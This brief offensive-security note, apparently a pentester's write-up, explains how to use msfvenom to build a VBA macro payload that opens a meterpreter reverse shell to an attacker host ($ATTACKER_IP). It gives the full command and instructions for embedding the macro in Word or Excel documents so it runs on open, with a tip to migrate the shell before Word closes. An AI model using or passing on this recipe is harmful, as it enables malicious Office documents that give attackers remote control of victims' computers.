Metasploit’s msfvenom can create VBA payloads, as one might expect. Despite WSH not wanting to pop cmd.exe or other executables (outside of calc.exe), a meterpreter reverse shell actually works! (That said, it will die when Word does, and thus needs to be migrated to a new process ASAP…)
msfvenom -p windows/meterpreter/reverse_tcp \
LHOST=$ATTACKER_IP LPORT=$ATTACKER_PORT \
-f vba -o ${NAME}.vbaTo work, the VBA output must be copied into a Microsoft Office document as a macro. By default msfvenom will use the Workbook_Open() function; this is suitable for Excel, but must be changed to Document_Open() for Word.